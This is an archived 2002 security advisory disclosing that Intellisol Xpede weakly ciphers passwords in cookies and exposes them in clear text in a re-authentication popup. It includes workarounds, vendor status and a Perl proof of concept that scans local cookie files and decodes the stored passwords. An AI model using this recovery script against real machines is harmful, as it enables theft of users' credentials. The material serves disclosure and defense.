('binary' encoding is not supported, stored as-is) Passwords exposed in Intellisol XPede ========================== About Xpede ========= quote from http://www.workforceroi.com/solutions/pa/index.shtml "Intellisol Xpede is a browser-based time and expense entry and project cost management module designed to connect a remote workforce on a real- time basis. Intellisol Project Accounting is designed for any professional service organization such as consulting, software development, law, architecture, engineering, PR/advertising and more with between 10 and 500 million dollars in revenue and up to 500 employees, and integrates with Microsoft Great Plains Business Solutions financial suites. " Problems ======= Tested with Xpede 4.1 / NT 4.0 Two security vulnerabilites has been discovered in the way Xpede handle users password. 1/ Xpede's cookies store users password "ciphered" in a very weak manner (a mix of shifts and permutations), recovering a clear text password from there is really trivial making users remotely vulnerable from cross site scripting based attacks, various MSIE bugs while users are locally vulnerable as well, by accessing the local filesystem (ie the cookie file) when, for instance, a user decide to use someone else's computer or is using a computer for wich he shares Administrator rights with other. 2/ Passwords are shown in a clear form into the "session timeout" re-authentication popup source. The dangerous guilty javascript snipet simulate a "remember password" option and tests if it was checked to automatically fill up the formular password field. The clear password is shown as is, in the javascript source code, whatever the user decided to do with the option. Indeed, a user can have a false sense of safety, leaving his host even few seconds without having filled up the authentication popup and therefore exposing his password to everybody lurking at the source and, once again, is remotely vulnerable to the same MSIE bugs mentionned above. Temp workarounds ============= 1 st problem / clear all cookies via MSIE "Tools/Internet Options/General/Delete Cookies" right after a session has ended to avoid local attack and patch your browser with the latests security fixes if it wasn't already done (anyway, u may fall in more serious troubles in the latter case :). 2 nd problem/ do not expose the authentication popup to unwise eyes (login or quit the application) and again, patch your browser for remote attacks. Additionnaly for paranoids, i suggest to close all MSIE running windows before accessing Xpede application (and during the session). Vendor status ========= The vendor has been contacted on March 13. and as far as i know, is currently working on a patch, in the meantime, u may want to use the above workarounds. Versions ====== Xpede support team has reported that both Xpede 4.1 and 7.x series were affected by these vulnerabilities. Author & Date =========== Gregory Duchemin (c3rb3rat_private) 20 March 2002. Have a nice day. Proof of concept (password recovery from cookies) ==================================== #!/usr/bin/perl # Xdeep.pl, search for and decipher Xpede passwords stored in these damn cookies # Pr00f of concept, not to be used for illegal purposes. # # Author: Gregory Duchemin Aka c3rb3r // March 2002 # #output format format STDOUT = + Userid: @<<<<<<< $userid + Realname: @<<<<<<<<<<<<<<<<<<<<<<<<< $realname + Company: @<<<<<<<<<<<<<<<<<<<< $company + Encoded password: @<<<<<<<<<<<<<<<<<<<< $password . #Cookie fingerprint $signature="defPWD"; #decoding stuff @PERMU=('9', '11', '2', '6', '4', '10', '1', '8', '7', '3', '5'); @ALPHA= ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O' , 'P', 'Q', 'R','S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a','b','c','d',' e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y' ,'z'); @SHIFT=(9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23); #Change the following path to match your system @COOKIE= glob ('c:\winnt\Profiles\*\Cookies\*@*.txt'); $i=$count=0; @FOUND= ('nope'); print "\n\nXdeep.pl Xpede cookies finder and decoder \n\n-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 -- \n\n\n"; foreach $try (@COOKIE) { $count++; if (open(handle, $try)) { @lines=<handle>; if (!index($lines[0], $signature)) { printf("\n+ Xpede cookie found ! yep :) <=> %s\n", $try); $FOUND[$i]=$try; $i++; } close(handle); } } printf("\n+ %d files checked.\n", $count); if (! $i) { print "\n\n- No Xpede cookie found, sorry\n\n"; exit(0); } printf("\n\n+ %d Cookie(s) found.\n", $i); print "\n\n\n[Press return]\n"; $try=<STDIN>; foreach $try (@FOUND) { if (open(handle, $try)) { @lines=<handle>; $userid= @lines[55]; $realname=@lines[64]; $password=@lines[46]; $company=@lines[28]; $realname =~ s/\+/ /; $userid =~ s/\+/ /; $password =~ s/\+/ /; $company =~ s/\+/ /; $userid =~ s/%([a-f0-9][a-f0-9])/pack("C", hex ($1))/eig; $realname =~ s/%([a-f0-9][a-f0-9])/pack("C", hex ($1))/eig; $password =~ s/%([a-f0-9][a-f0-9])/pack("C", hex ($1))/eig; $company =~ s/%([a-f0-9][a-f0-9])/pack("C", hex ($1))/eig; printf "\n+ Found Xpede cookie :\n>> %s <<\n\n", $try; write; print "\n\n! Cr4cking 1n progr3ss ... \n"; @list=split //, $password; if (length($password) > 12 ) { $MAX = 11; $DIFF = length($password)-1-$MAX; for ($i = 0; $i < ($DIFF); $i++) {$REST = $REST.$list [$i]; } splice(@list, 0, ($DIFF)); printf "\n+ Clear part is %s\n", $REST; } else {$MAX = length($password)-1;printf "\n- No clear part found \n";} for ($i=0; $i<$MAX; $i) { $temp_pass = $temp_pass.$list[$PERMU[$i++]-1]; } printf "\n+ Permutations give %s\n", $temp_pass; @list=split //, $temp_pass; for ($i=0; $i<$MAX; $i++) { $b = ord($list[$i]); $c = $SHIFT[$i]; $flag=0; for ($z=0; $z<52; $z+=1) { if (ord($ALPHA[$z]) == $b) { $a = ord($ALPHA [($z+$c)%52]);$flag=1;} } if (!$flag) {$a = $b;} $decode = $decode.chr($a); printf "\n+ %s Shift(%d) \t --> \t%s", chr($b), $c, chr ($a); } printf "\n\n+ Shifting with secret key give %s\n", $decode; printf "\n! Password is \"%s\"\n\n", $decode.$REST; printf "\n\n- End.\n\n"; $decode=$REST=$temp_pass=""; close(handle); print "\n\n[Press return]\n"; $try=<STDIN>; } }
This archive was generated by hypermail 2b30 : Fri Mar 22 2002 - 08:51:24 PST